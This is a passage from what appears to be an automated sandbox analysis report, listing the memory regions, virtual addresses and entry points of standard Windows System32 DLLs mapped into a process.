mapped_file name = "ncryptprov.dll" filename = "\\Windows\\System32\\ncryptprov.dll" (normalized: "c:\\windows\\system32\\ncryptprov.dll") Region: id = 1659 start_va = 0x7ffb46210000 end_va = 0x7ffb4622dfff monitored = 0 entry_point = 0x7ffb4621ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1660 start_va = 0x7ffb46310000 end_va = 0x7ffb4638ffff monitored = 0 entry_point = 0x7ffb4633d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1661 start_va = 0x7ffb46390000 end_va = 0x7ffb463c5fff monitored = 0 entry_point = 0x7ffb463927f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1662 start_va = 0x7ffb46540000 end_va = 0x7ffb46555fff monitored = 0 entry_point = 0x7ffb46541d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1663 start_va = 0x7ffb46780000 end_va = 0x7ffb46ab9fff monitored = 0 entry_point = 0x7ffb46788520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1664 start_va = 0x7ffb485f0000 end_va = 0x7ffb48600fff monitored = 0 entry_point = 0x7ffb485f7480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1665 start_va = 0x7ffb48610000 end_va = 0x7ffb48693fff monitored = 0 entry_point = 0x7ffb48628d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1666 start_va = 0x7ffb486c0000 end_va = 0x7ffb486d5fff monitored = 0 entry_point = 0x7ffb486c55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1667 start_va = 0x7ffb486e0000 end_va = 0x7ffb487b5fff monitored = 0 entry_point = 0x7ffb4870a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1668 start_va = 0x7ffb487e0000 end_va = 0x7ffb487f5fff monitored = 0 entry_point = 0x7ffb487e1af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1669 start_va = 0x7ffb48800000 end_va = 0x7ffb48819fff monitored = 0 entry_point = 0x7ffb48802330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1670 start_va = 0x7ffb48820000 end_va = 0x7ffb48883fff monitored = 0 entry_point = 0x7ffb4883bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1671 start_va = 0x7ffb48890000 end_va = 0x7ffb488b4fff monitored = 0 entry_point = 0x7ffb48899900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1672 start_va = 0x7ffb488c0000 end_va = 0x7ffb489b5fff monitored = 0 entry_point = 0x7ffb488f9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1673 start_va = 0x7ffb489c0000 end_va = 0x7ffb48af6fff monitored = 0 entry_point = 0x7ffb48a00480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1674 start_va = 0x7ffb48eb0000 end_va = 0x7ffb48ebffff monitored = 0 entry_point = 0x7ffb48eb1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1675 start_va = 0x7ffb48ec0000 end_va = 0x7ffb48ecefff monitored = 0 entry_point = 0x7ffb48ec4960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1676 start_va = 0x7ffb48ed0000 end_va = 0x7ffb48ee0fff monitored = 0 entry_point = 0x7ffb48ed2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1677 start_va = 0x7ffb48ef0000 end_va = 0x7ffb48f71fff monitored = 0 entry_point = 0x7ffb48ef2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1678 start_va = 0x7ffb49070000 end_va = 0x7ffb49083fff monitored = 0 entry_point = 0x7ffb49071800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1679 start_va = 0x7ffb49090000 end_va = 0x7ffb49103fff monitored = 0 entry_point = 0x7ffb490a5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1680 start_va = 0x7ffb49110000 end_va = 0x7ffb4911cfff monitored = 0 entry_point = 0x7ffb49111420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1681 start_va = 0x7ffb49390000 end_va = 0x7ffb493d1fff monitored = 0 entry_point = 0x7ffb49393670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1682 start_va = 0x7ffb493e0000 end_va = 0x7ffb493ebfff monitored = 0 entry_point = 0x7ffb493e35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1683 start_va = 0x7ffb493f0000 end_va = 0x7ffb49435fff monitored = 0 entry_point = 0x7ffb493f79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1684 start_va = 0x7ffb49440000 end_va = 0x7ffb4947ffff monitored = 0 entry_point = 0x7ffb4944cbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1685 start_va = 0x7ffb49480000 end_va = 0x7ffb494c6fff monitored = 0 entry_point = 0x7ffb49481d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1686 start_va = 0x7ffb494d0000 end_va = 0x7ffb494eefff monitored = 0 entry_point = 0x7ffb494d37e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1687 start_va = 0x7ffb494f0000 end_va = 0x7ffb49568fff monitored = 0 entry_point = 0x7ffb494f76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1688 start_va = 0x7ffb49570000 end_va = 0x7ffb495affff monitored = 0 entry_point = 0x7ffb49586c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1689 start_va = 0x7ffb49640000 end_va = 0x7ffb49657fff monitored = 0 entry_point = 0x7ffb49644e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1690 start_va = 0x7ffb49660000 end_va = 0x7ffb49684fff monitored = 0 entry_point = 0x7ffb49665ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1691 start_va = 0x7ffb49860000 end_va = 0x7ffb49b58fff monitored = 0 entry_point = 0x7ffb49927280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1692 start_va = 0x7ffb49c10000 end_va = 0x7ffb49c50fff monitored = 0 entry_point = 0x7ffb49c13750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1693 start_va = 0x7ffb49c60000 end_va = 0x7ffb49d52fff monitored = 0 entry_point = 0x7ffb49c85d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1694 start_va = 0x7ffb49d60000 end_va = 0x7ffb49e02fff monitored = 0 entry_point = 0x7ffb49d62c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1695 start_va = 0x7ffb49e10000 end_va = 0x7ffb49e61fff monitored = 0 entry_point = 0x7ffb49e15770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1696 start_va = 0x7ffb49e70000 end_va = 0x7ffb49e9dfff monitored = 1 entry_point = 0x7ffb49e72300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1697 start_va = 0x7ffb49ea0000 end_va = 0x7ffb49efdfff monitored = 0 entry_point = 0x7ffb49ea5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1698 start_va = 0x7ffb49f00000 end_va = 0x7ffb49f1ffff monitored = 0 entry_point = 0x7ffb49f01f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1699 start_va = 0x7ffb49f20000 end_va = 0x7ffb49f28fff monitored = 0 entry_point = 0x7ffb49f218f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1700 start_va = 0x7ffb49f30000 end_va = 0x7ffb49f40fff monitored = 0 entry_point = 0x7ffb49f31d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1701 start_va = 0x7ffb4a080000 end_va = 0x7ffb4a0cbfff monitored = 0 entry_point = 0x7ffb4a095310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1702 start_va = 0x7ffb4a0d0000 end_va = 0x7ffb4a0e7fff monitored = 0 entry_point = 0x7ffb4a0d2000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1703 start_va = 0x7ffb4a0f0000 end_va = 0x7ffb4a271fff monitored = 0 entry_point = 0x7ffb4a1082a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1704 start_va = 0x7ffb4a2b0000 end_va = 0x7ffb4a32efff monitored = 0 entry_point = 0x7ffb4a2c7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1705 start_va = 0x7ffb4a330000 end_va = 0x7ffb4a36bfff monitored = 0 entry_point = 0x7ffb4a336aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1706 start_va = 0x7ffb4a410000 end_va = 0x7ffb4a444fff monitored = 0 entry_point = 0x7ffb4a41a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1707 start_va = 0x7ffb4ada0000 end_va = 0x7ffb4ada8fff monitored = 0 entry_point = 0x7ffb4ada21d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1708 start_va = 0x7ffb4b0d0000 end_va = 0x7ffb4b0e1fff monitored = 0 entry_point = 0x7ffb4b0d3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1709 start_va = 0x7ffb4b160000 end_va = 0x7ffb4b17afff monitored = 0 entry_point = 0x7ffb4b161040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1710 start_va = 0x7ffb4b410000 end_va = 0x7ffb4b419fff monitored = 0 entry_point = 0x7ffb4b4114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1711 start_va = 0x7ffb4b940000 end_va = 0x7ffb4b954fff monitored = 0 entry_point = 0x7ffb4b942dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1712 start_va = 0x7ffb4b960000 end_va = 0x7ffb4b96dfff monitored = 0 entry_point = 0x7ffb4b961460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1713 start_va = 0x7ffb4bac0000 end_va = 0x7ffb4bacffff monitored = 0 entry_point = 0x7ffb4bac1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1714 start_va = 0x7ffb4bad0000 end_va = 0x7ffb4bad8fff monitored = 0 entry_point = 0x7ffb4bad1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1715 start_va = 0x7ffb4bae0000 end_va = 0x7ffb4bb0cfff monitored = 0 entry_point = 0x7ffb4bae2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1716 start_va = 0x7ffb4bb10000 end_va = 0x7ffb4bb61fff monitored = 0 entry_point = 0x7ffb4bb138e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1717 start_va = 0x7ffb4bb80000 end_va = 0x7ffb4bc03fff monitored = 0 entry_point = 0x7ffb4bb92830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1718 start_va = 0x7ffb4bc10000 end_va = 0x7ffb4bca9fff monitored = 0 entry_point = 0x7ffb4bc2ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1719 start_va = 0x7ffb4bcb0000 end_va = 0x7ffb4bcc4fff monitored = 0 entry_point = 0x7ffb4bcb3460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1720 start_va = 0x7ffb4bda0000 end_va = 0x7ffb4be5ffff monitored = 0 entry_point = 0x7ffb4bdcfd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1721 start_va = 0x7ffb4be70000 end_va = 0x7ffb4bed6fff monitored = 0 entry_point = 0x7ffb4be763e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1722 start_va = 0x7ffb4bfd0000 end_va = 0x7ffb4c010fff monitored = 0 entry_point = 0x7ffb4bfd4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1723 start_va = 0x7ffb4c020000 end_va = 0x7ffb4c02afff monitored = 0 entry_point = 0x7ffb4c021d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1724 start_va = 0x7ffb4c030000 end_va = 0x7ffb4c03bfff monitored = 0 entry_point = 0x7ffb4c032830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1725 start_va = 0x7ffb4c130000 end_va = 0x7ffb4c143fff monitored = 0 entry_point = 0x7ffb4c132d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1726 start_va = 0x7ffb4c1b0000 end_va = 0x7ffb4c429fff monitored = 0 entry_point = 0x7ffb4c1ca7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1727 start_va = 0x7ffb4c4c0000 end_va = 0x7ffb4c552fff monitored = 0 entry_point = 0x7ffb4c4c9680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1728 start_va = 0x7ffb4c570000 end_va = 0x7ffb4c585fff monitored = 0 entry_point = 0x7ffb4c57b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 1729 start_va = 0x7ffb4c670000 end_va = 0x7ffb4c71dfff monitored = 0 entry_point = 0x7ffb4c6880c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1730 start_va = 0x7ffb4c720000 end_va = 0x7ffb4c731fff monitored = 0 entry_point = 0x7ffb4c729260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 1731 start_va = 0x7ffb4c740000 end_va = 0x7ffb4c7f0fff monitored = 0 entry_point = 0x7ffb4c7b88b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 1732 start_va = 0x7ffb4c800000 end_va = 0x7ffb4c818fff monitored = 0 entry_point = 0x7ffb4c804520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1733 start_va = 0x7ffb4c890000 end_va = 0x7ffb4c8a1fff monitored = 0 entry_point = 0x7ffb4c891a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1734 start_va = 0x7ffb4cd20000 end_va = 0x7ffb4cd4dfff monitored = 0 entry_point = 0x7ffb4cd27550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1735 start_va = 0x7ffb4cd50000 end_va = 0x7ffb4cd5cfff monitored = 0 entry_point = 0x7ffb4cd52ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1736 start_va = 0x7ffb4cd60000 end_va = 0x7ffb4cd8efff monitored = 0 entry_point = 0x7ffb4cd68910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1737 start_va = 0x7ffb4cd90000 end_va = 0x7ffb4cda5fff monitored = 0 entry_point = 0x7ffb4cd91b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1738 start_va = 0x7ffb4cdb0000 end_va = 0x7ffb4ce95fff monitored = 0 entry_point = 0x7ffb4cdccf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1739 start_va = 0x7ffb4cea0000 end_va = 0x7ffb4cec4fff monitored = 0 entry_point = 0x7ffb4ceb2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 1740 start_va = 0x7ffb4ced0000 end_va = 0x7ffb4cee0fff monitored = 0 entry_point = 0x7ffb4ced7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 1741 start_va = 0x7ffb4cf50000 end_va = 0x7ffb4cf69fff monitored = 0 entry_point = 0x7ffb4cf52430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1742 start_va = 0x7ffb4cf70000 end_va = 0x7ffb4cf85fff monitored = 0 entry_point = 0x7ffb4cf719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1743 start_va = 0x7ffb4cfd0000 end_va = 0x7ffb4d007fff monitored = 0 entry_point = 0x7ffb4cfe8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1744 start_va = 0x7ffb4d0c0000 end_va = 0x7ffb4d12dfff monitored = 0 entry_point = 0x7ffb4d0c7f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1745 start_va = 0x7ffb4d130000 end_va = 0x7ffb4d13ffff monitored = 0 entry_point = 0x7ffb4d132c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1746 start_va = 0x7ffb4d300000 end_va = 0x7ffb4d681fff monitored = 0 entry_point = 0x7ffb4d351220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1747 start_va = 0x7ffb4d690000 end_va = 0x7ffb4d7c5fff monitored = 0 entry_point = 0x7ffb4d6bf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1748 start_va = 0x7ffb4e8c0000 end_va = 0x7ffb4e9cdfff monitored = 0 entry_point = 0x7ffb4e90eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1749 start_va = 0x7ffb4ea50000 end_va = 0x7ffb4ea66fff monitored = 0 entry_point = 0x7ffb4ea56620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 1750 start_va = 0x7ffb4ecd0000 end_va = 0x7ffb4ece9fff monitored = 0 entry_point = 0x7ffb4ecd2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 1751 start_va = 0x7ffb4ecf0000 end_va = 0x7ffb4ecfbfff monitored = 0 entry_point = 0x7ffb4ecf14d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1752 start_va = 0x7ffb4ed00000 end_va = 0x7ffb4ed10fff monitored = 0 entry_point = 0x7ffb4ed03320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1753 start_va = 0x7ffb4ed20000 end_va = 0x7ffb4ed60fff monitored = 0 entry_point = 0x7ffb4ed37eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1754 start_va = 0x7ffb4ed70000 end_va = 0x7ffb4ee6bfff monitored = 0 entry_point = 0x7ffb4eda6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1755 start_va = 0x7ffb4ef80000 end_va = 0x7ffb4efd4fff monitored = 0 entry_point = 0x7ffb4ef83fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1756 start_va = 0x7ffb4efe0000 end_va = 0x7ffb4f016fff monitored = 0 entry_point = 0x7ffb4efe6020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1757 start_va = 0x7ffb4f020000 end_va = 0x7ffb4f03ffff monitored = 0 entry_point = 0x7ffb4f0239a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1758 start_va = 0x7ffb4f040000 end_va = 0x7ffb4f107fff monitored = 0 entry_point = 0x7ffb4f0813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1759 start_va = 0x7ffb4f110000 end_va = 0x7ffb4f170fff monitored = 0 entry_point = 0x7ffb4f114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1760 start_va = 0x7ffb4f180000 end_va = 0x7ffb4f2fbfff monitored = 0 entry_point = 0x7ffb4f1d1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1761 start_va = 0x7ffb4f300000 end_va = 0x7ffb4f30afff monitored = 0 entry_point = 0x7ffb4f301770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1762 start_va = 0x7ffb4f310000 end_va = 0x7ffb4f3cefff monitored = 0 entry_point = 0x7ffb4f331c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1763 start_va = 0x7ffb4f6c0000 end_va = 0x7ffb4f6d6fff monitored = 0 entry_point = 0x7ffb4f6c5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1764 start_va = 0x7ffb4f6e0000 end_va = 0x7ffb4f71dfff monitored = 0 entry_point = 0x7ffb4f6ea050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 